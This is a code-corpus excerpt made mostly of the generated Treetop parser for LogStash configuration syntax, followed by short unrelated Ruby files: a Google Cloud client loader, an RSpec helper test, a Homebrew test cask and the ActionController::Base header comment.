r1 = _nt_hashentry
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt_whitespace
s3 << r4
if r4
r5 = _nt_hashentry
s3 << r5
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Hashentries0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::HashEntries,input, i0...index, s0)
r0.extend(Hashentries1)
else
@index = i0
r0 = nil
end
node_cache[:hashentries][start_index] = r0
r0
end
module Hashentry0
def name
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def value
elements[4]
end
end
def _nt_hashentry
start_index = index
if node_cache[:hashentry].has_key?(index)
cached = node_cache[:hashentry][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
i1 = index
r2 = _nt_number
if r2
r1 = r2
else
r3 = _nt_bareword
if r3
r1 = r3
else
r4 = _nt_string
if r4
r1 = r4
else
@index = i1
r1 = nil
end
end
end
s0 << r1
if r1
r5 = _nt__
s0 << r5
if r5
if has_terminal?("=>", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=>")
r6 = nil
end
s0 << r6
if r6
r7 = _nt__
s0 << r7
if r7
r8 = _nt_value
s0 << r8
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::HashEntry,input, i0...index, s0)
r0.extend(Hashentry0)
else
@index = i0
r0 = nil
end
node_cache[:hashentry][start_index] = r0
r0
end
module Branch0
def _
elements[0]
end
def else_if
elements[1]
end
end
module Branch1
def _
elements[0]
end
def else
elements[1]
end
end
module Branch2
def if
elements[0]
end
end
def _nt_branch
start_index = index
if node_cache[:branch].has_key?(index)
cached = node_cache[:branch][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_if
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt__
s3 << r4
if r4
r5 = _nt_else_if
s3 << r5
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Branch0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
if r2
i7, s7 = index, []
r8 = _nt__
s7 << r8
if r8
r9 = _nt_else
s7 << r9
end
if s7.last
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
r7.extend(Branch1)
else
@index = i7
r7 = nil
end
if r7
r6 = r7
else
r6 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r6
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Branch,input, i0...index, s0)
r0.extend(Branch2)
else
@index = i0
r0 = nil
end
node_cache[:branch][start_index] = r0
r0
end
module If0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module If1
def _1
elements[1]
end
def condition
elements[2]
end
def _2
elements[3]
end
def _3
elements[5]
end
end
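# Grammar sketch (reconstructed from the generated code below):
#   rule if
#     "if" _ condition _ "{" _ (branch_or_plugin _)* "}" <LogStash::Config::AST::If>
#   end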
def _nt_if
start_index = index
if node_cache[:if].has_key?(index)
cached = node_cache[:if][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("if", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("if")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_condition
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
if has_terminal?("{", false, index)
r5 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r5 = nil
end
s0 << r5
if r5
r6 = _nt__
s0 << r6
if r6
s7, i7 = [], index
loop do
i8, s8 = index, []
r9 = _nt_branch_or_plugin
s8 << r9
if r9
r10 = _nt__
s8 << r10
end
if s8.last
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
r8.extend(If0)
else
@index = i8
r8 = nil
end
if r8
s7 << r8
else
break
end
end
r7 = instantiate_node(SyntaxNode,input, i7...index, s7)
s0 << r7
if r7
if has_terminal?("}", false, index)
r11 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r11 = nil
end
s0 << r11
end
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::If,input, i0...index, s0)
r0.extend(If1)
else
@index = i0
r0 = nil
end
node_cache[:if][start_index] = r0
r0
end
module ElseIf0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module ElseIf1
def _1
elements[1]
end
def _2
elements[3]
end
def condition
elements[4]
end
def _3
elements[5]
end
def _4
elements[7]
end
end
def _nt_else_if
start_index = index
if node_cache[:else_if].has_key?(index)
cached = node_cache[:else_if][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("else", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("else")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("if", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("if")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_condition
s0 << r5
if r5
r6 = _nt__
s0 << r6
if r6
if has_terminal?("{", false, index)
r7 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r7 = nil
end
s0 << r7
if r7
r8 = _nt__
s0 << r8
if r8
s9, i9 = [], index
loop do
i10, s10 = index, []
r11 = _nt_branch_or_plugin
s10 << r11
if r11
r12 = _nt__
s10 << r12
end
if s10.last
r10 = instantiate_node(SyntaxNode,input, i10...index, s10)
r10.extend(ElseIf0)
else
@index = i10
r10 = nil
end
if r10
s9 << r10
else
break
end
end
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
s0 << r9
if r9
if has_terminal?("}", false, index)
r13 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r13 = nil
end
s0 << r13
end
end
end
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Elsif,input, i0...index, s0)
r0.extend(ElseIf1)
else
@index = i0
r0 = nil
end
node_cache[:else_if][start_index] = r0
r0
end
module Else0
def branch_or_plugin
elements[0]
end
def _
elements[1]
end
end
module Else1
def _1
elements[1]
end
def _2
elements[3]
end
end
def _nt_else
start_index = index
if node_cache[:else].has_key?(index)
cached = node_cache[:else][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("else", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("else")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("{", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("{")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
s5, i5 = [], index
loop do
i6, s6 = index, []
r7 = _nt_branch_or_plugin
s6 << r7
if r7
r8 = _nt__
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(Else0)
else
@index = i6
r6 = nil
end
if r6
s5 << r6
else
break
end
end
r5 = instantiate_node(SyntaxNode,input, i5...index, s5)
s0 << r5
if r5
if has_terminal?("}", false, index)
r9 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("}")
r9 = nil
end
s0 << r9
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Else,input, i0...index, s0)
r0.extend(Else1)
else
@index = i0
r0 = nil
end
node_cache[:else][start_index] = r0
r0
end
module Condition0
def _1
elements[0]
end
def boolean_operator
elements[1]
end
def _2
elements[2]
end
def expression
elements[3]
end
end
module Condition1
def expression
elements[0]
end
end
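# Grammar sketch (reconstructed from the generated code below):
#   rule condition
#     expression (_ boolean_operator _ expression)* <LogStash::Config::AST::Condition>
#   end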
def _nt_condition
start_index = index
if node_cache[:condition].has_key?(index)
cached = node_cache[:condition][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_expression
s0 << r1
if r1
s2, i2 = [], index
loop do
i3, s3 = index, []
r4 = _nt__
s3 << r4
if r4
r5 = _nt_boolean_operator
s3 << r5
if r5
r6 = _nt__
s3 << r6
if r6
r7 = _nt_expression
s3 << r7
end
end
end
if s3.last
r3 = instantiate_node(SyntaxNode,input, i3...index, s3)
r3.extend(Condition0)
else
@index = i3
r3 = nil
end
if r3
s2 << r3
else
break
end
end
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
s0 << r2
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::Condition,input, i0...index, s0)
r0.extend(Condition1)
else
@index = i0
r0 = nil
end
node_cache[:condition][start_index] = r0
r0
end
module Expression0
def _1
elements[1]
end
def condition
elements[2]
end
def _2
elements[3]
end
end
def _nt_expression
start_index = index
if node_cache[:expression].has_key?(index)
cached = node_cache[:expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
i1, s1 = index, []
if has_terminal?("(", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r2 = nil
end
s1 << r2
if r2
r3 = _nt__
s1 << r3
if r3
r4 = _nt_condition
s1 << r4
if r4
r5 = _nt__
s1 << r5
if r5
if has_terminal?(")", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r6 = nil
end
s1 << r6
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(Expression0)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::Expression)
else
r7 = _nt_negative_expression
if r7
r0 = r7
r0.extend(LogStash::Config::AST::Expression)
else
r8 = _nt_in_expression
if r8
r0 = r8
r0.extend(LogStash::Config::AST::Expression)
else
r9 = _nt_not_in_expression
if r9
r0 = r9
r0.extend(LogStash::Config::AST::Expression)
else
r10 = _nt_compare_expression
if r10
r0 = r10
r0.extend(LogStash::Config::AST::Expression)
else
r11 = _nt_regexp_expression
if r11
r0 = r11
r0.extend(LogStash::Config::AST::Expression)
else
r12 = _nt_rvalue
if r12
r0 = r12
r0.extend(LogStash::Config::AST::Expression)
else
@index = i0
r0 = nil
end
end
end
end
end
end
end
node_cache[:expression][start_index] = r0
r0
end
module NegativeExpression0
def _1
elements[1]
end
def _2
elements[3]
end
def condition
elements[4]
end
def _3
elements[5]
end
end
module NegativeExpression1
def _
elements[1]
end
def selector
elements[2]
end
end
def _nt_negative_expression
start_index = index
if node_cache[:negative_expression].has_key?(index)
cached = node_cache[:negative_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
i1, s1 = index, []
if has_terminal?("!", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("!")
r2 = nil
end
s1 << r2
if r2
r3 = _nt__
s1 << r3
if r3
if has_terminal?("(", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r4 = nil
end
s1 << r4
if r4
r5 = _nt__
s1 << r5
if r5
r6 = _nt_condition
s1 << r6
if r6
r7 = _nt__
s1 << r7
if r7
if has_terminal?(")", false, index)
r8 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r8 = nil
end
s1 << r8
end
end
end
end
end
end
if s1.last
r1 = instantiate_node(SyntaxNode,input, i1...index, s1)
r1.extend(NegativeExpression0)
else
@index = i1
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::NegativeExpression)
else
i9, s9 = index, []
if has_terminal?("!", false, index)
r10 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("!")
r10 = nil
end
s9 << r10
if r10
r11 = _nt__
s9 << r11
if r11
r12 = _nt_selector
s9 << r12
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(NegativeExpression1)
else
@index = i9
r9 = nil
end
if r9
r0 = r9
r0.extend(LogStash::Config::AST::NegativeExpression)
else
@index = i0
r0 = nil
end
end
node_cache[:negative_expression][start_index] = r0
r0
end
module InExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def in_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_in_expression
start_index = index
if node_cache[:in_expression].has_key?(index)
cached = node_cache[:in_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_in_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::InExpression,input, i0...index, s0)
r0.extend(InExpression0)
else
@index = i0
r0 = nil
end
node_cache[:in_expression][start_index] = r0
r0
end
module NotInExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def not_in_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_not_in_expression
start_index = index
if node_cache[:not_in_expression].has_key?(index)
cached = node_cache[:not_in_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_not_in_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::NotInExpression,input, i0...index, s0)
r0.extend(NotInExpression0)
else
@index = i0
r0 = nil
end
node_cache[:not_in_expression][start_index] = r0
r0
end
def _nt_in_operator
start_index = index
if node_cache[:in_operator].has_key?(index)
cached = node_cache[:in_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
if has_terminal?("in", false, index)
r0 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("in")
r0 = nil
end
node_cache[:in_operator][start_index] = r0
r0
end
module NotInOperator0
def _
elements[1]
end
end
def _nt_not_in_operator
start_index = index
if node_cache[:not_in_operator].has_key?(index)
cached = node_cache[:not_in_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("not ", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("not ")
r1 = nil
end
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("in", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("in")
r3 = nil
end
s0 << r3
end
end
if s0.last
r0 = instantiate_node(SyntaxNode,input, i0...index, s0)
r0.extend(NotInOperator0)
else
@index = i0
r0 = nil
end
node_cache[:not_in_operator][start_index] = r0
r0
end
def _nt_rvalue
start_index = index
if node_cache[:rvalue].has_key?(index)
cached = node_cache[:rvalue][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
r1 = _nt_string
if r1
r0 = r1
else
r2 = _nt_number
if r2
r0 = r2
else
r3 = _nt_selector
if r3
r0 = r3
else
r4 = _nt_array
if r4
r0 = r4
else
r5 = _nt_method_call
if r5
r0 = r5
else
r6 = _nt_regexp
if r6
r0 = r6
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:rvalue][start_index] = r0
r0
end
module MethodCall0
def _1
elements[0]
end
def _2
elements[2]
end
def rvalue
elements[3]
end
end
module MethodCall1
def rvalue
elements[0]
end
end
module MethodCall2
def method
elements[0]
end
def _1
elements[1]
end
def _2
elements[3]
end
def _3
elements[5]
end
end
def _nt_method_call
start_index = index
if node_cache[:method_call].has_key?(index)
cached = node_cache[:method_call][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_method
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
if has_terminal?("(", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("(")
r3 = nil
end
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i6, s6 = index, []
r7 = _nt_rvalue
s6 << r7
if r7
s8, i8 = [], index
loop do
i9, s9 = index, []
r10 = _nt__
s9 << r10
if r10
if has_terminal?(",", false, index)
r11 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(",")
r11 = nil
end
s9 << r11
if r11
r12 = _nt__
s9 << r12
if r12
r13 = _nt_rvalue
s9 << r13
end
end
end
if s9.last
r9 = instantiate_node(SyntaxNode,input, i9...index, s9)
r9.extend(MethodCall0)
else
@index = i9
r9 = nil
end
if r9
s8 << r9
else
break
end
end
r8 = instantiate_node(SyntaxNode,input, i8...index, s8)
s6 << r8
end
if s6.last
r6 = instantiate_node(SyntaxNode,input, i6...index, s6)
r6.extend(MethodCall1)
else
@index = i6
r6 = nil
end
if r6
r5 = r6
else
r5 = instantiate_node(SyntaxNode,input, index...index)
end
s0 << r5
if r5
r14 = _nt__
s0 << r14
if r14
if has_terminal?(")", false, index)
r15 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(")")
r15 = nil
end
s0 << r15
end
end
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::MethodCall,input, i0...index, s0)
r0.extend(MethodCall2)
else
@index = i0
r0 = nil
end
node_cache[:method_call][start_index] = r0
r0
end
def _nt_method
start_index = index
if node_cache[:method].has_key?(index)
cached = node_cache[:method][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
r0 = _nt_bareword
node_cache[:method][start_index] = r0
r0
end
module CompareExpression0
def rvalue1
elements[0]
end
def _1
elements[1]
end
def compare_operator
elements[2]
end
def _2
elements[3]
end
def rvalue2
elements[4]
end
end
def _nt_compare_expression
start_index = index
if node_cache[:compare_expression].has_key?(index)
cached = node_cache[:compare_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_compare_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
r5 = _nt_rvalue
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::ComparisonExpression,input, i0...index, s0)
r0.extend(CompareExpression0)
else
@index = i0
r0 = nil
end
node_cache[:compare_expression][start_index] = r0
r0
end
def _nt_compare_operator
start_index = index
if node_cache[:compare_operator].has_key?(index)
cached = node_cache[:compare_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
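    # Ordered choice over the comparison operators: the two-character
    # operators ("<=", ">=") are tried before their one-character prefixes
    # ("<", ">"), as PEG ordered choice requires.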
if has_terminal?("==", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("==")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("!=", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("!=")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("<=", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("<=")
r3 = nil
end
if r3
r0 = r3
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?(">=", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure(">=")
r4 = nil
end
if r4
r0 = r4
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?("<", false, index)
r5 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("<")
r5 = nil
end
if r5
r0 = r5
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
if has_terminal?(">", false, index)
r6 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure(">")
r6 = nil
end
if r6
r0 = r6
r0.extend(LogStash::Config::AST::ComparisonOperator)
else
@index = i0
r0 = nil
end
end
end
end
end
end
node_cache[:compare_operator][start_index] = r0
r0
end
module RegexpExpression0
def rvalue
elements[0]
end
def _1
elements[1]
end
def regexp_operator
elements[2]
end
def _2
elements[3]
end
end
def _nt_regexp_expression
start_index = index
if node_cache[:regexp_expression].has_key?(index)
cached = node_cache[:regexp_expression][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
r1 = _nt_rvalue
s0 << r1
if r1
r2 = _nt__
s0 << r2
if r2
r3 = _nt_regexp_operator
s0 << r3
if r3
r4 = _nt__
s0 << r4
if r4
i5 = index
r6 = _nt_string
if r6
r5 = r6
else
r7 = _nt_regexp
if r7
r5 = r7
else
@index = i5
r5 = nil
end
end
s0 << r5
end
end
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::RegexpExpression,input, i0...index, s0)
r0.extend(RegexpExpression0)
else
@index = i0
r0 = nil
end
node_cache[:regexp_expression][start_index] = r0
r0
end
def _nt_regexp_operator
start_index = index
if node_cache[:regexp_operator].has_key?(index)
cached = node_cache[:regexp_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("=~", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("=~")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::RegExpOperator)
else
if has_terminal?("!~", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("!~")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::RegExpOperator)
else
@index = i0
r0 = nil
end
end
node_cache[:regexp_operator][start_index] = r0
r0
end
def _nt_boolean_operator
start_index = index
if node_cache[:boolean_operator].has_key?(index)
cached = node_cache[:boolean_operator][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0 = index
if has_terminal?("and", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 3))
@index += 3
else
terminal_parse_failure("and")
r1 = nil
end
if r1
r0 = r1
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("or", false, index)
r2 = instantiate_node(SyntaxNode,input, index...(index + 2))
@index += 2
else
terminal_parse_failure("or")
r2 = nil
end
if r2
r0 = r2
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("xor", false, index)
r3 = instantiate_node(SyntaxNode,input, index...(index + 3))
@index += 3
else
terminal_parse_failure("xor")
r3 = nil
end
if r3
r0 = r3
r0.extend(LogStash::Config::AST::BooleanOperator)
else
if has_terminal?("nand", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 4))
@index += 4
else
terminal_parse_failure("nand")
r4 = nil
end
if r4
r0 = r4
r0.extend(LogStash::Config::AST::BooleanOperator)
else
@index = i0
r0 = nil
end
end
end
end
node_cache[:boolean_operator][start_index] = r0
r0
end
def _nt_selector
start_index = index
if node_cache[:selector].has_key?(index)
cached = node_cache[:selector][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
s0, i0 = [], index
loop do
r1 = _nt_selector_element
if r1
s0 << r1
else
break
end
end
if s0.empty?
@index = i0
r0 = nil
else
r0 = instantiate_node(LogStash::Config::AST::Selector,input, i0...index, s0)
end
node_cache[:selector][start_index] = r0
r0
end
module SelectorElement0
end
def _nt_selector_element
start_index = index
if node_cache[:selector_element].has_key?(index)
cached = node_cache[:selector_element][index]
if cached
cached = SyntaxNode.new(input, index...(index + 1)) if cached == true
@index = cached.interval.end
end
return cached
end
i0, s0 = index, []
if has_terminal?("[", false, index)
r1 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("[")
r1 = nil
end
s0 << r1
if r1
s2, i2 = [], index
loop do
if has_terminal?('\G[^\\], ]', true, index)
r3 = true
@index += 1
else
r3 = nil
end
if r3
s2 << r3
else
break
end
end
if s2.empty?
@index = i2
r2 = nil
else
r2 = instantiate_node(SyntaxNode,input, i2...index, s2)
end
s0 << r2
if r2
if has_terminal?("]", false, index)
r4 = instantiate_node(SyntaxNode,input, index...(index + 1))
@index += 1
else
terminal_parse_failure("]")
r4 = nil
end
s0 << r4
end
end
if s0.last
r0 = instantiate_node(LogStash::Config::AST::SelectorElement,input, i0...index, s0)
r0.extend(SelectorElement0)
else
@index = i0
r0 = nil
end
node_cache[:selector_element][start_index] = r0
r0
end
end
class LogStashConfigParser < Treetop::Runtime::CompiledParser
include LogStashConfig
end
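# Minimal usage sketch (Treetop's CompiledParser API; the config snippet is
# illustrative):
#
#   parser = LogStashConfigParser.new
#   result = parser.parse("filter { mutate { } }")
#   raise parser.failure_reason unless result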
| 21.157534 | 94 | 0.477056 |
7a60d9b50e3f483b7a7dbdeb8692641027e7d86a | 1,370 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "google/cloud/osconfig/agentendpoint/v1beta/agent_endpoint_service"
require "google/cloud/agentendpoint/v1beta/version"
module Google
module Cloud
module Osconfig
module Agentendpoint
##
# To load this package, including all its services, and instantiate a client:
#
# require "google/cloud/osconfig/agentendpoint/v1beta"
# client = ::Google::Cloud::Osconfig::Agentendpoint::V1beta::AgentEndpointService::Client.new
#
module V1beta
end
end
end
end
end
helper_path = ::File.join __dir__, "v1beta", "_helpers.rb"
require "google/cloud/osconfig/agentendpoint/v1beta/_helpers" if ::File.file? helper_path
| 33.414634 | 105 | 0.726277 |
d50daa39369e18dc39efca899a9e2c0e8fd023c4 | 1,159 | describe ServiceHelper::TextualSummary do
describe ".textual_orchestration_stack" do
let(:os_cloud) { FactoryGirl.create(:orchestration_stack_cloud, :name => "cloudstack1") }
let(:os_infra) { FactoryGirl.create(:orchestration_stack_openstack_infra, :name => "infrastack1") }
before do
login_as FactoryGirl.create(:user)
end
subject { textual_orchestration_stack }
it 'contains the link to the associated cloud stack' do
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_cloud)
expect(textual_orchestration_stack).to eq(os_cloud)
end
it 'contains the link to the associated infra stack' do
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_infra)
expect(textual_orchestration_stack).to eq(os_infra)
end
it 'contains no link for an invalid stack' do
os_infra.id = nil
@record = FactoryGirl.create(:service)
allow(@record).to receive(:orchestration_stack).and_return(os_infra)
expect(textual_orchestration_stack[:link]).to be_nil
end
end
end
| 37.387097 | 103 | 0.725626 |
ed1b82599c179cd6c199ece0a8d4be404cef1a1e | 258 | class GzippedAsset < TestCask
version '1.2.3'
sha256 '832506ade94b3e41ecdf2162654eb75891a0749803229e82b2e0420fd1b9e8d2'
url TestHelper.local_binary_url('gzipped_asset.gz')
homepage 'http://example.com/gzipped-asset'
app 'gzipped-asset-1.2.3'
end
| 25.8 | 75 | 0.790698 |
3378d6db0fbd4dad9924cc12510a294485f4fe13 | 11,214 | # frozen_string_literal: true
require "action_view"
require "action_controller/log_subscriber"
require "action_controller/metal/params_wrapper"
module ActionController
# Action Controllers are the core of a web request in \Rails. They are made up of one or more actions that are executed
# on request and then either it renders a template or redirects to another action. An action is defined as a public method
# on the controller, which will automatically be made accessible to the web-server through \Rails Routes.
#
# By default, only the ApplicationController in a \Rails application inherits from <tt>ActionController::Base</tt>. All other
# controllers inherit from ApplicationController. This gives you one class to configure things such as
# request forgery protection and filtering of sensitive request parameters.
#
# A sample controller could look like this:
#
# class PostsController < ApplicationController
# def index
# @posts = Post.all
# end
#
# def create
# @post = Post.create params[:post]
# redirect_to posts_path
# end
# end
#
